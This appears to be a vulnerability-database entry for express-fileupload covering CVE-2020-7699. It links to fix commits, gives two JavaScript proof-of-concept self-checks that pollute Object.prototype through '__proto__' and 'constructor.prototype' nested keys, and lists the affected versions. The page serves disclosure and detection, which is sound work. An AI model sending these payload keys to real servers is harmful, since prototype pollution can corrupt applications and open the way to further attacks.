Simple express file upload middleware that wraps around Busboy
Latest version: 1.2.1
CVE | Fix |
---|---|
CVE-2020-7699 | https://github.com/richardgirges/express-fileupload/commit/9fca550f08a9dc07cc3500921f4fa7879cf88b8f, https://github.com/richardgirges/express-fileupload/pull/237/files |
// Self-check for CVE-2020-7699 (prototype pollution) against the installed
// express-fileupload: a dotted key that starts with `__proto__` is passed to
// the library's nested-key helper. In the library this helper is applied to
// request fields when the `parseNested` option is enabled, so the key is
// attacker-controlled in that configuration.
// Run this in a throwaway process: a positive result means Object.prototype
// stays modified for the rest of the process.
const processNested = require('express-fileupload/lib/processNested');

const dottedKeyInput = { '__proto__.a': 'b' };
processNested(dottedKeyInput);

// A fresh object literal has no own `a`; reading 'b' here means the call above
// wrote to the shared Object.prototype, i.e. the installed version is affected
// and should be upgraded past the vulnerable range listed for this check.
const freshObject = {};
if (freshObject.a === 'b') {
  console.log('exploitable');
}
Vulnerable versions (`__proto__` key, snippet above): 1.1.1-alpha.1
1.1.1-alpha.2
1.1.1-alpha.3
1.1.2-alpha.1
1.1.3-alpha.1
1.1.3-alpha.2
1.1.4
1.1.5
1.1.6-alpha.1
1.1.6-alpha.2
1.1.6-alpha.3
1.1.6-alpha.4
1.1.6-alpha.5
1.1.6-alpha.6
1.1.6
1.1.7-alpha.1
1.1.7-alpha.2
1.1.7-alpha.3
1.1.7-alpha.4
// Self-check for the `constructor.prototype` form of the same prototype
// pollution issue in express-fileupload's nested-key helper. This path reaches
// Object.prototype without using the `__proto__` key, so a filter that only
// rejects `__proto__` does not cover it; the version list for this check also
// includes 1.1.8.
// Run this in a throwaway process: a positive result means Object.prototype
// stays modified for the rest of the process.
const processNested = require('express-fileupload/lib/processNested');

const constructorKeyInput = { 'constructor.prototype.a': 'b' };
processNested(constructorKeyInput);

// A fresh object literal has no own `a`; reading 'b' here means the call above
// wrote to the shared Object.prototype and the installed version is affected.
const untouchedObject = {};
if (untouchedObject.a === 'b') {
  console.log('exploitable');
}
Vulnerable versions (`constructor.prototype` key, snippet above; this list also includes 1.1.8): 1.1.1-alpha.1
1.1.1-alpha.2
1.1.1-alpha.3
1.1.2-alpha.1
1.1.3-alpha.1
1.1.3-alpha.2
1.1.4
1.1.5
1.1.6-alpha.1
1.1.6-alpha.2
1.1.6-alpha.3
1.1.6-alpha.4
1.1.6-alpha.5
1.1.6-alpha.6
1.1.6
1.1.7-alpha.1
1.1.7-alpha.2
1.1.7-alpha.3
1.1.7-alpha.4
1.1.8